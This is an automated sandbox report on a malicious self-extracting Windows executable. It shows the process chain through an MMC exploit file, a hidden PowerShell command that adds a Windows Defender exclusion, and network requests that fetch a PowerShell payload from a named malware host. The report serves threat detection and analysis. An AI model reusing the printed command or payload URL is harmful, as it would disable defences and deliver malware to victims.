Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IPt9U27NoX.exe

Overview

General Information

Sample name:IPt9U27NoX.exe
renamed because original name is a hash value
Original sample name:eef6cf314280f0a8bd7724dc8095783596fa6657ac95ee63a01c4b0228f26833.exe
Analysis ID:1636991
MD5:7e287e5f835ef3b491383dd8626eead6
SHA1:3a8a61f315d73a881a591f246fa8c12d594f9d53
SHA256:eef6cf314280f0a8bd7724dc8095783596fa6657ac95ee63a01c4b0228f26833
Tags:exeTHEPACKShanghaiCorpuser-JAMESWT_MHT
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Sigma detected: MMC Spawning Windows Shell
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • IPt9U27NoX.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\IPt9U27NoX.exe" MD5: 7E287E5F835EF3B491383DD8626EEAD6)
    • mmc.exe (PID: 6456 cmdline: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
      • powershell.exe (PID: 6776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP} MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5764 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • svchost.exe (PID: 6668 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Karneades, Swisscom CSIRT: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 6456, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 6776, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 6456, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 6776, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 6456, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 6776, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 6456, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 6776, ProcessName: powershell.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , CommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\mmc.exe, NewProcessName: C:\Windows\System32\mmc.exe, OriginalFileName: C:\Windows\System32\mmc.exe, ParentCommandLine: "C:\Users\user\Desktop\IPt9U27NoX.exe", ParentImage: C:\Users\user\Desktop\IPt9U27NoX.exe, ParentProcessId: 6264, ParentProcessName: IPt9U27NoX.exe, ProcessCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , ProcessId: 6456, ProcessName: mmc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" , ParentImage: C:\Windows\System32\mmc.exe, ParentProcessId: 6456, ParentProcessName: mmc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}, ProcessId: 6776, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6668, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-13T10:55:22.237464+010020537062Potentially Bad Traffic172.67.191.12443192.168.2.749685TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-13T10:58:28.356267+010018100002Potentially Bad Traffic192.168.2.749699172.67.191.12443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://eatertoken.com/f7sjdjf2w1/payload/builds/brave.ps1Avira URL Cloud: Label: malware
Source: IPt9U27NoX.exeVirustotal: Detection: 7%Perma Link
Source: IPt9U27NoX.exeStatic PE information: certificate valid
Source: unknownHTTPS traffic detected: 172.67.191.12:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: IPt9U27NoX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: IPt9U27NoX.exe
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A2B190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF752A2B190
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A140BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF752A140BC
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A3FCA0 FindFirstFileExA,0_2_00007FF752A3FCA0
Source: Joe Sandbox ViewIP Address: 172.67.191.12 172.67.191.12
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49699 -> 172.67.191.12:443
Source: Network trafficSuricata IDS: 2053706 - Severity 2 - ET EXPLOIT [TW] EXPLOIT Possible MMC Remote Command Execution : 172.67.191.12:443 -> 192.168.2.7:49685
Source: global trafficHTTP traffic detected: GET /f7sjdjf2w1/brave/ HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: eatertoken.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /f7sjdjf2w1/payload/builds/brave.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: eatertoken.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /f7sjdjf2w1/brave/ HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: eatertoken.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /f7sjdjf2w1/payload/builds/brave.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: eatertoken.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: eatertoken.com
Source: IPt9U27NoX.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: IPt9U27NoX.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: IPt9U27NoX.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: IPt9U27NoX.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: IPt9U27NoX.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: IPt9U27NoX.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1086052135.000001569006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: IPt9U27NoX.exeString found in binary or memory: http://ocsps.ssl.com0
Source: IPt9U27NoX.exeString found in binary or memory: http://ocsps.ssl.com0?
Source: IPt9U27NoX.exeString found in binary or memory: http://ocsps.ssl.com0P
Source: powershell.exe, 00000002.00000002.1063237057.0000015680229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1063237057.0000015680229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1063237057.0000015680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1063237057.0000015680229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1063237057.0000015680229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: IPt9U27NoX.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: IPt9U27NoX.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: powershell.exe, 00000002.00000002.1063237057.0000015680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1086052135.000001569006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1086052135.000001569006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1086052135.000001569006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: mmc.exe, 00000001.00000002.2760018003.0000000003017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/
Source: mmc.exe, 00000001.00000002.2760018003.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000001.00000003.910582631.0000000002A0E000.00000004.00000020.00020000.00000000.sdmp, exploit.msc.0.drString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/
Source: mmc.exe, 00000001.00000002.2761143860.0000000004C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/...
Source: mmc.exe, 00000001.00000002.2759696432.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/.../brave/rave/(g
Source: mmc.exe, 00000001.00000002.2759696432.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/.../brave/rave/.g
Source: mmc.exe, 00000001.00000002.2761143860.0000000004C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/...8
Source: mmc.exe, 00000001.00000002.2759696432.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/...AAAAAAAAAAAA
Source: mmc.exe, 00000001.00000002.2758377801.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/.com/f7sjdjf2w1/brave/
Source: mmc.exe, 00000001.00000002.2760018003.0000000002FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/9
Source: mmc.exe, 00000001.00000002.2760018003.000000000309D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/:
Source: mmc.exe, 00000001.00000002.2759696432.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000001.00000003.906633001.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000001.00000003.906659683.0000000002B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/AAAAAAAAAAAAAAAA
Source: mmc.exe, 00000001.00000002.2759696432.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000001.00000003.906633001.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000001.00000003.906659683.0000000002B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/AAAAAAAAAAAAAAAAAAAAAA
Source: mmc.exe, 00000001.00000002.2759696432.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/AAAAAAAAAAAAAAAAAAAAAA_
Source: mmc.exe, 00000001.00000002.2759696432.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/AAACgAAACAAAAAIAAAAAEAV
Source: mmc.exe, 00000001.00000002.2760018003.000000000306D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/HM
Source: mmc.exe, 00000001.00000002.2760717082.0000000004AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/Hu
Source: mmc.exe, 00000001.00000002.2761143860.0000000004C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/P
Source: mmc.exe, 00000001.00000002.2760018003.000000000306D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/Q
Source: mmc.exe, 00000001.00000002.2760018003.000000000306D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/d0
Source: mmc.exe, 00000001.00000002.2758377801.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/f2w1/brave/...
Source: mmc.exe, 00000001.00000002.2758377801.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/g
Source: mmc.exe, 00000001.00000002.2761059010.0000000004BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/https://eatertoken.com/f7sjdjf2w1/brave/
Source: mmc.exe, 00000001.00000002.2760018003.0000000002FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/o
Source: mmc.exe, 00000001.00000002.2760018003.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/t
Source: mmc.exe, 00000001.00000002.2758377801.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/brave/xpoit.mscZ
Source: mmc.exe, 00000001.00000002.2761059010.0000000004BDE000.00000004.00000800.00020000.00000000.sdmp, mmc.exe, 00000001.00000002.2760018003.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000001.00000002.2761143860.0000000004CA5000.00000004.00000020.00020000.00000000.sdmp, brave[1].htm.1.drString found in binary or memory: https://eatertoken.com/f7sjdjf2w1/payload/builds/brave.ps1
Source: mmc.exe, 00000001.00000002.2760018003.000000000309D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eatertoken.com/f7sjdjf2wave/...R
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000006.00000003.1203251881.0000019AD80C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000002.00000002.1063237057.0000015680229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: mmc.exe, 00000001.00000002.2760018003.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000002.00000002.1086052135.000001569006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: IPt9U27NoX.exeString found in binary or memory: https://www.ssl.com/repository0
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
Source: unknownHTTPS traffic detected: 172.67.191.12:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A0C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF752A0C2F0
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A1A4AC0_2_00007FF752A1A4AC
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A234840_2_00007FF752A23484
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A2B1900_2_00007FF752A2B190
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A307540_2_00007FF752A30754
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A149280_2_00007FF752A14928
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A0F9300_2_00007FF752A0F930
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A21F200_2_00007FF752A21F20
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A05E240_2_00007FF752A05E24
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A2CE880_2_00007FF752A2CE88
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A253F00_2_00007FF752A253F0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A221D00_2_00007FF752A221D0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A1F1800_2_00007FF752A1F180
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A0A3100_2_00007FF752A0A310
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A0C2F00_2_00007FF752A0C2F0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A072880_2_00007FF752A07288
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A1126C0_2_00007FF752A1126C
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A048400_2_00007FF752A04840
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A3C8380_2_00007FF752A3C838
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A425500_2_00007FF752A42550
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A1B5340_2_00007FF752A1B534
